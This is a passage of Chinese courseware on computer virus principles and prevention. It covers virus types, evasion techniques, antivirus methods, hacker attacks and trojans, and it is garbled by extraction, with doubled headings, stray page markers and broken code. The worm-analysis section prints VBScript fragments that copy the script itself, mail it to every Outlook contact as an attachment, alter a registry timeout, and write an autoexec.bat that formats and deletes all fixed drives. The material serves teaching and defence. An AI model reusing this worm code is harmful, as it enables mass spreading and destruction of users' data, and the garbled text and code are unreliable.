計算機病毒原理及防治課件

1、 第第1212章章 計算機病毒原理及防治計算機病毒原理及防治 -1-第第1212章章 計算機病毒原理及防治計算機病毒原理及防治 12.1 計算機病毒的概述計算機病毒的概述12.3 反計算機病毒技術(shù)反計算機病毒技術(shù)12.4 蠕蟲病毒分析蠕蟲病毒分析12.5 黑客程序與特洛伊木馬黑客程序與特洛伊木馬12.6 反病毒軟件簡介反病毒軟件簡介 第第1212章章 計算機病毒原理及防治計算機病毒原理及防治 -2-12.1 計算機病毒的概述 “計算機病毒是指編制或者在計算機程序中破壞計算機功能或者毀壞數(shù)據(jù)，影響計算機使用，并能自我復(fù)制的一組計算機指令或者程序代碼”。這個定義明確表明了計算機病毒就是具有破壞性的

2、計算機程序。 12.1.2 計算機病毒的特征 （1）破壞性。 （2）隱蔽性。 （3）傳染性。 （4）潛伏性。 （5）可觸發(fā)性。 （6）不可預(yù)見性。 第第1212章章 計算機病毒原理及防治計算機病毒原理及防治 -3- 12.1.3 計算機病毒的產(chǎn)生原因 （1）軟件產(chǎn)品的脆弱性是產(chǎn)生計算機病毒根本的技術(shù)原因。 （2）社會因素是產(chǎn)生計算機病毒的土壤。 12.1.4 計算機病毒的傳播途徑 計算機病毒主要是通過復(fù)制文件、發(fā)送文件、運行程序等操作傳播的。通常有以下幾種傳播途徑： 1移動存儲設(shè)備。包括軟盤、硬盤、移動硬盤、光盤、磁帶等。 2網(wǎng)絡(luò)。由于網(wǎng)絡(luò)覆蓋面廣、速度快，為病毒的快速傳播創(chuàng)造了條件。目前大多

3、數(shù)新式病毒都是通過網(wǎng)絡(luò)進(jìn)行傳播的，破壞性很大。 第第1212章章 計算機病毒原理及防治計算機病毒原理及防治 -4- 12.1.5 計算機病毒的分類 引導(dǎo)型病毒：主要通過感染軟盤、硬盤上的引導(dǎo)扇區(qū)或改寫磁盤分區(qū)表（FAT）來感染系統(tǒng)，引導(dǎo)型病毒是一種開機即可啟動的病毒，優(yōu)先于操作系統(tǒng)而存在。該病毒幾乎常駐內(nèi)存，激活時即可發(fā)作，破壞性大，早期的計算機病毒大多數(shù)屬于這類病毒。 文件型病毒：它主要是以感染COM、EXE等可執(zhí)行文件為主，被感染的可執(zhí)行文件在執(zhí)行的同時，病毒被加載并向其它正常的可執(zhí)行文件傳染。病毒以這些可執(zhí)行文件為載體，當(dāng)運行可執(zhí)行文件時就可以激活病毒。 宏病毒：宏病毒是一種寄存于文檔或

4、模板的宏中的計算機病毒，是利用宏語言編寫的。 第第1212章章 計算機病毒原理及防治計算機病毒原理及防治 -5- 蠕蟲病毒：蠕蟲病毒與一般的計算機病毒不同，蠕蟲病毒不需要將其自身附著到宿主程序上。蠕蟲病毒主要通過網(wǎng)絡(luò)傳播，具有極強的自我復(fù)制能力、傳播性和破壞性。 特洛伊木馬型病毒：特洛伊木馬型病毒實際上就是黑客程序。黑客程序一般不對計算機系統(tǒng)進(jìn)行直接破壞，而是通過網(wǎng)絡(luò)竊取國家、部門或個人寶貴的秘密信息，占用其它計算機系統(tǒng)資源等現(xiàn)象。 網(wǎng)頁病毒：網(wǎng)頁病毒一般也是使用腳本語言將有害代碼直接寫在網(wǎng)頁上，當(dāng)瀏覽網(wǎng)頁時會立即破壞本地計算機系統(tǒng)，輕者修改或鎖定主頁，重者格式化硬盤，使你防不勝防。 混合型病

5、毒：兼有上述計算機病毒特點的病毒統(tǒng)稱為混合型病毒，所以它的破壞性更大，傳染的機會也更多，殺毒也更加困難。 第第1212章章 計算機病毒原理及防治計算機病毒原理及防治 -6- 12.1.6 計算機病毒的表現(xiàn)現(xiàn)象 1平時運行正常的計算機突然經(jīng)常性無緣無故地死機。 2運行速度明顯變慢。 3打印和通訊發(fā)生異常。 4系統(tǒng)文件的時間、日期、大小發(fā)生變化。 5磁盤空間迅速減少。 6收到陌生人發(fā)來的電子郵件。 8硬盤燈不斷閃爍。 9計算機不識別硬盤。 10操作系統(tǒng)無法正常啟動。 11部分文檔丟失或被破壞。 12網(wǎng)絡(luò)癱瘓。 第第1212章章 計算機病毒原理及防治計算機病毒原理及防治 -7- 12.1.7 計算機

6、病毒程序一般構(gòu)成 1安裝模塊安裝模塊 病毒程序必須通過自身的程序?qū)崿F(xiàn)自啟動并安裝到計算機系統(tǒng)中，不同類型的病毒程序會使用不同的安裝方法。 2傳染模塊傳染模塊 傳染模塊包括三部分內(nèi)容： （1）傳染控制部分。 （2）傳染判斷部分。 （3）傳染操作部分。 3破壞模塊破壞模塊 破壞模塊包括兩部分：一是激發(fā)控制，當(dāng)病毒滿足一個條件,病毒就發(fā)作；另一個就是破壞操作，不同病毒有不同的操作方法，典型的惡性病毒是瘋狂拷貝、刪除文件等。 第第1212章章 計算機病毒原理及防治計算機病毒原理及防治 -8-12.2 計算機病毒制作技術(shù)計算機病毒制作技術(shù) 1腳本語言與ActiveX技術(shù) 新型計算機病毒卻利用Java S

7、cript或VBScrip腳本語言和ActiveX技術(shù)直接將病毒寫到網(wǎng)頁上，完全不需要宿主程序。腳本語言和ActiveX的執(zhí)行方式是把程序代碼寫在網(wǎng)頁上，當(dāng)連接到這個網(wǎng)站時，瀏覽器就會利用本地的計算機系統(tǒng)資源自動執(zhí)行這些程序代碼，使用者就會在毫無察覺的情況下，執(zhí)行了一些來路不明的程序，遭到病毒的攻擊。 第第1212章章 計算機病毒原理及防治計算機病毒原理及防治 -9- 2采用自加密技術(shù)采用自加密技術(shù) 計算機病毒采用自加密技術(shù)就是為了防止被計算機病毒檢測程序掃描出來，并被輕易地反匯編。計算機病毒使用了加密技術(shù)后，對分析和破譯計算機病毒的代碼及清除計算機病毒等工作都增加了很多困難。3采用變形技術(shù)采

8、用變形技術(shù) 當(dāng)某些計算機病毒編制者通過修改某種已知計算機病毒的代碼，使其能夠躲過現(xiàn)有計算機病毒檢測程序時，稱這種新出現(xiàn)的計算機病毒是原來被修改計算機病毒的變形。當(dāng)這種變形了的計算機病毒繼承了原父本計算機病毒的主要特征時，就被稱為是其父本計算機病毒的一個變種。 第第1212章章 計算機病毒原理及防治計算機病毒原理及防治 -10- 4采用特殊的隱形技術(shù)采用特殊的隱形技術(shù) 當(dāng)計算機病毒采用特殊的隱形技術(shù)后，可以在計算機病毒進(jìn)入內(nèi)存后，使計算機用戶幾乎感覺不到它的存在。 對付隱形計算機病毒最好的辦法就是在未受計算機病毒感染的環(huán)境下去觀察它。 5對抗計算機病毒防范系統(tǒng)對抗計算機病毒防范系統(tǒng) 計算機病毒采

9、用對抗計算機病毒防范系統(tǒng)技術(shù)時，當(dāng)發(fā)現(xiàn)磁盤上有某些著名的計算機病毒殺毒軟件或在文件中查找到出版這些軟件的公司名時，就會刪除這些殺毒軟件或文件，造成殺毒軟件失效，甚至引起計算機系統(tǒng)崩潰。 第第1212章章 計算機病毒原理及防治計算機病毒原理及防治 -11- 6反跟蹤技術(shù) 計算機病毒采用反跟蹤措施的目的是要提高計算機病毒程序的防破譯能力和偽裝能力。常規(guī)程序使用的反跟蹤技術(shù)在計算機病毒程序中都可以利用。 7中斷與計算機病毒 中斷是CPU處理外部突發(fā)事件的一個重要技術(shù)。它能使CPU在運行過程中對外部事件發(fā)出的中斷請求及時地進(jìn)行處理，處理完成后又立即返回斷點，繼續(xù)進(jìn)行CPU原來的工作。但另一方面，病毒設(shè)

10、計者則會篡改中斷功能為達(dá)到傳染、激發(fā)和破壞等目的。如INT 13H是磁盤輸入輸出中斷，引導(dǎo)型病毒就是用它來傳染病毒和格式化磁盤的。 第第1212章章 計算機病毒原理及防治計算機病毒原理及防治 -12-12.3 反計算機病毒技術(shù)反計算機病毒技術(shù) 1實時反病毒技術(shù)實時反病毒技術(shù) 實時反病毒是對任何程序在調(diào)用之前都被先過濾一遍，一有病毒侵入，它就報警，并自動殺毒，將病毒拒之門外，做到防患于未然。實時反病毒就是要解決用戶對病毒的“未知性”問題。而這個問題是計算機反病毒技術(shù)發(fā)展至今一直沒有得到很好解決的問題。2病毒防火墻病毒防火墻 病毒防火墻是從近幾年頗為流行的信息安全防火墻中延伸出來的一種新概念，其宗

11、旨就是對系統(tǒng)實施實時監(jiān)控，對流入、流出系統(tǒng)的數(shù)據(jù)中可能含有的病毒代碼進(jìn)行過濾。 第第1212章章 計算機病毒原理及防治計算機病毒原理及防治 -13- 3VxD機制機制 反病毒軟件利用VxD程序具有比其它類型應(yīng)用程序更高的優(yōu)先級，而且更靠近系統(tǒng)底層資源這一優(yōu)勢使反病毒軟件才有可能全面、徹底地控制系統(tǒng)資源，并在病毒入侵時及時殺毒。 4 虛擬機技術(shù)虛擬機技術(shù) 虛擬機技術(shù)具體的做法是：用程序代碼虛擬一個CPU，同樣也虛擬CPU的各個寄存器，硬件端口，用調(diào)試程序調(diào)入被調(diào)的“樣本”，將每一個語句放到虛擬環(huán)境中執(zhí)行，這樣我們就可以通過內(nèi)存和寄存器以及端口的變化來了解程序的執(zhí)行情況。這樣的一個虛擬環(huán)境就是一個

12、虛擬機。將病毒放到虛擬機中執(zhí)行，則病毒的傳染和破壞等動作一定會被反映出來。理想情況下未知病毒的查出概率將是100。 第第1212章章 計算機病毒原理及防治計算機病毒原理及防治 -14- 5主動內(nèi)核技術(shù)主動內(nèi)核技術(shù) 由于操作系統(tǒng)和網(wǎng)絡(luò)協(xié)議等自身不完善性和缺陷，使計算機病毒有機可乘。主動內(nèi)核技術(shù)是從操作系統(tǒng)內(nèi)核這一深度，主動給操作系統(tǒng)和網(wǎng)絡(luò)系統(tǒng)打了一個個“補丁”，這些補丁將從安全的角度對系統(tǒng)或網(wǎng)絡(luò)進(jìn)行管理和檢查，對系統(tǒng)的漏洞進(jìn)行修補，任何文件在進(jìn)入系統(tǒng)之前，作為主動內(nèi)核的反病毒模塊都將首先使用各種手段對文件進(jìn)行檢測處理。 6啟發(fā)掃描的反病毒技術(shù)啟發(fā)掃描的反病毒技術(shù) 一個運用啟發(fā)式掃描技術(shù)的病毒檢測

13、軟件，實際上就是以特定方式實現(xiàn)對有關(guān)指令序列的反編譯，逐步理解和確定其蘊藏的真正動機。 第第1212章章 計算機病毒原理及防治計算機病毒原理及防治 -15- 7郵件病毒防殺技術(shù)郵件病毒防殺技術(shù) 郵件病毒防殺技術(shù)是基于網(wǎng)絡(luò)環(huán)境的嵌入式查殺病毒技術(shù)，它采用智能郵件客戶端代理監(jiān)控iSMCP（Smart Mail Client Proxy）技術(shù)。目前 iSMCP 技術(shù)支持廣泛流行的POP3協(xié)議，支持多種流行的郵件客戶端，比如 Outlook Express, FoxMail , Netscape 等，并且能同時代理監(jiān)控多個郵件客戶端同時收取郵件；具有完善的郵件解碼技術(shù)，能對MIME/UUEncode

14、類型的郵件的各個部分（如附件文件）進(jìn)行病毒掃描，清除病毒后能將無毒的郵件數(shù)據(jù)重新編碼，傳送給郵件客戶端，并且能夠更改主題、添加查毒報告附件；同時具有完善的網(wǎng)絡(luò)監(jiān)控功能，它能在郵件到達(dá)郵件客戶端之前就進(jìn)行攔截，讓病毒無機可乘；具備垃圾郵件處理功能，自動過濾垃圾郵件，有效避免網(wǎng)絡(luò)堵塞。 第第1212章章 計算機病毒原理及防治計算機病毒原理及防治 -16-12.4 蠕蟲病毒分析蠕蟲病毒分析 12.4.1 蠕蟲病毒特征 蠕蟲病毒有很強的自我復(fù)制能力、很強的傳播性、潛伏性 、特定的觸發(fā)性、很大的破壞性。與其它病毒不同的是蠕蟲不需要將其自身附著到宿主程序上。這主要是由于蠕蟲病毒大都使用腳本語言編寫，并利用

15、了視窗系統(tǒng)的開放性特點，特別是COM到COM+的組件編程思路及ActiveX控件，使一個程序能調(diào)用功能更大的組件來完成病毒功能。 第第1212章章 計算機病毒原理及防治計算機病毒原理及防治 -17-1蠕蟲病毒的自我復(fù)制能力蠕蟲病毒的自我復(fù)制能力 Set objFs=CreateObject （“Scripting.”） objFs.CreateTextFile （“C:virus.txt”，1） 如果我們把這兩句話保存成為.vbs的VB腳本文件，點擊鼠標(biāo)就會在C盤中創(chuàng)建一個TXT文件了。如果我們把第二句改為：objFs.Get）.Copy （“C：Virus.vbs”） 該 句 前 面 是 打

16、 開 這 個 腳 本 文 件 ，WScript.ScriptFullName指明是這個程序本身，是一個完整的路徑文件名。GetFile函數(shù)獲得這個文件，Copy函數(shù)將這個文件復(fù)制到C盤根目錄下Virus.vbs文件。這么簡單的兩句就實現(xiàn)了自我復(fù)制的功能，已經(jīng)具備病毒的基本特征，即自我復(fù)制能力。 第第1212章章 計算機病毒原理及防治計算機病毒原理及防治 -18-2蠕蟲病毒的傳播性蠕蟲病毒的傳播性其VB腳本代碼如下： Set objOA=Wscript.CreateObject （“Outlook.Application”）Set objMapi=objOA.GetNameSpace （“MAP

17、I”）For i=1 to objMapi.AddressLists.CountSet objAddList=objMapi.AddressLists （i） For j=1 To objAddList. AddressEntries.Count Set objMail=objOA.CreateItem （0） objMail.Recipients.Add （objAddList. AddressEntries （j）objMail.Subject=“你好!” objMail.Body=“這次給你的附件，是我的新文檔！” objMail.Attachments.Add （“c:virus.vb

18、s”） 第第1212章章 計算機病毒原理及防治計算機病毒原理及防治 -19-objMail.SendNext Next Set objMapi=NothingSet objOA=Nothing 3蠕蟲病毒的潛伏性蠕蟲病毒的潛伏性 dim wscr,rr set wscr=CreateObject （WScript.Shell）rr=wscr.RegRead （HKEY_CURRENT_USERSoftwareMicrosoftWindows Scripting HostSettingsTimeout）if （rr=1） then 第第1212章章 計算機病毒原理及防治計算機病毒原理及防治 -2

19、0-wscr.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindows Scripting HostSettingsTimeout”,0,“REG_DWORD”end if4蠕蟲病毒的觸發(fā)性蠕蟲病毒的觸發(fā)性 x=time（） if x=xx.xx.xx then end if5蠕蟲病毒的破壞性蠕蟲病毒的破壞性sub killc （）On Error Resume Next 第第1212章章 計算機病毒原理及防治計算機病毒原理及防治 -21-dim fs,auto,disc,ds,ss,i,x,dirSet fs = CreateObject （“S

20、cripting.”）Set auto = fs.CreateTextFile （“c:Autoexec.bat”, True）auto.WriteLine （“echo off”）auto.WriteLine （“Smartdrv”）Set disc = fs.Drives For Each ds in discIf ds.DriveType = 2 Then ss = ss & ds.DriveLetterEnd ifNextss=LCase （StrReverse （Trim （ss） 第第1212章章 計算機病毒原理及防治計算機病毒原理及防治 -22-For i=1 to Le

21、n （ss）x=Mid （ss,i,1） auto.WriteLine （“format/autotest/q/u “&x&”:”）nextFor i=1 to Len （ss）x=Mid （ss,i,1）auto.WriteLine （“deltree/y“&x&”:”）nextauto.Closeset dir=fs.GetFile （“:Autoexec.bat”）dir.attributes=dir.attributes+2 End sub 第第1212章章 計算機病毒原理及防治計算機病毒原理及防治 -23- 12.4.2 蠕蟲病毒的防范 1把本地的帶有

22、破壞性的程序改名字，比如把改成。 2將Windows Script Host刪除，就不用擔(dān)心那些用VBS和JS編寫的病毒了。方法是： （1）卸載Windows Scripting Host，簡稱WSH， （2）刪除VBS、VBE、JS、JSE文件后綴名與應(yīng)用程序的映射。 （3）在Windows目錄中，更改名稱或者刪除WScript.exe和JScript.exe文件。 3禁止“”能控制VBS病毒傳播。 4將瀏覽器安全級設(shè)為中等。 5安裝實時病毒防火墻軟件。 第第1212章章 計算機病毒原理及防治計算機病毒原理及防治 -24-12.5 黑客程序與特洛伊木馬黑客程序與特洛伊木馬 12.5.1 黑客

23、攻擊的常用手段 1包攻擊。包攻擊。 黑客可利用一些工具產(chǎn)生畸形或碎片數(shù)據(jù)包，這些數(shù)據(jù)包不能被計算機正確合成，從而導(dǎo)致系統(tǒng)崩潰。 2服務(wù)型攻擊。服務(wù)型攻擊。 這種攻擊通常是黑客向計算機發(fā)送大量經(jīng)過偽裝的數(shù)據(jù)包，使計算機疲于響應(yīng)這些經(jīng)過偽裝的不可到達(dá)客戶的請求，從而使計算機不能響應(yīng)正常的客戶請求，或使計算機誤以為訪問的主機不可到達(dá)，從而達(dá)到切斷正常連接的目的。 第第1212章章 計算機病毒原理及防治計算機病毒原理及防治 -25- 3緩沖區(qū)溢出攻擊。緩沖區(qū)溢出攻擊。 這種攻擊是向操作系統(tǒng)或應(yīng)用程序發(fā)送超長字符串，由于程序本身設(shè)計的漏洞，未能對其進(jìn)行有效的檢驗，導(dǎo)致程序在緩沖區(qū)溢出時意外出錯甚至退出，

24、使黑客獲得到系統(tǒng)管理員的權(quán)限。 4口令攻擊。口令攻擊。 這種攻擊一般是依據(jù)一個包含常用單詞的字典文件、程序進(jìn)行大量的猜測，直到猜對口令并獲得訪問權(quán)為止。它通常使用蠻力攻擊方式。 5IP 地址和端口掃描。地址和端口掃描。 這種攻擊就是要確定你的IP地址是否可以到達(dá)，運行哪種操作系統(tǒng)，運行哪些服務(wù)器程序，是否有后門存在。所以，當(dāng)發(fā)現(xiàn)有人在掃描你的IP地址時，通常就意味著黑客攻擊的開始。 第第1212章章 計算機病毒原理及防治計算機病毒原理及防治 -26- 6對各種軟件漏洞的攻擊。對各種軟件漏洞的攻擊。 每當(dāng)新的操作系統(tǒng)、服務(wù)器程序等軟件發(fā)布之后，各種漏洞就會被不斷發(fā)現(xiàn)，這些漏洞常常被黑客利用，從而

25、有可能導(dǎo)致計算機泄密、被非法使用，甚至崩潰。 7特洛伊木馬攻擊。特洛伊木馬攻擊。 特洛伊木馬是一種在你不知道的情況下自動執(zhí)行惡意功能的程序，包括那些表面上執(zhí)行某個合法功能，而背后卻同時從事非法功能的程序。 12.5.2 特洛伊木馬 特洛伊木馬黑客程序一般有兩個部分組成：一個是服務(wù)器程序，另一個是控制器程序。如果計算機安裝了黑客服務(wù)器程序，那么，黑客就可以利用自身計算機控制器程序進(jìn)入你的計算機中，通過達(dá)到控制和監(jiān)視你的計算機的目的。 第第1212章章 計算機病毒原理及防治計算機病毒原理及防治 -27- 1特洛伊木馬的啟動方式特洛伊木馬的啟動方式 主要手法是加載到注冊表的啟動組中，也有些會捆綁到其

26、它程序上附帶地進(jìn)入內(nèi)存，如隨著操作系統(tǒng)的啟動而運行，捆綁的木馬可以由黑客自己確定捆綁方式、捆綁位置、捆綁程序等。比如將木馬捆綁到瀏覽器上，上網(wǎng)以后一打開瀏覽器，木馬被附帶啟動了并自動打開木馬端口，黑客就可以進(jìn)入你的計算機了 2特洛伊木馬端口特洛伊木馬端口 當(dāng)木馬在計算機中存在的時候，黑客就可以通過控制器程序命令木馬做事情了。這些命令是在網(wǎng)絡(luò)上傳遞的，需要遵守TCP/IP協(xié)議。TCP/IP協(xié)議規(guī)定計算機的端口有256*256=65536個，從0到65535號端口，木馬打開一個或者幾個端口，黑客所使用的控制器就可以進(jìn)入木馬打開的端口了。 第第1212章章 計算機病毒原理及防治計算機病毒原理及防治 -28- 3特洛伊木馬的隱藏特洛伊木馬的隱藏 木馬為了更好地隱藏自己，通常會將自己的位置放在c:window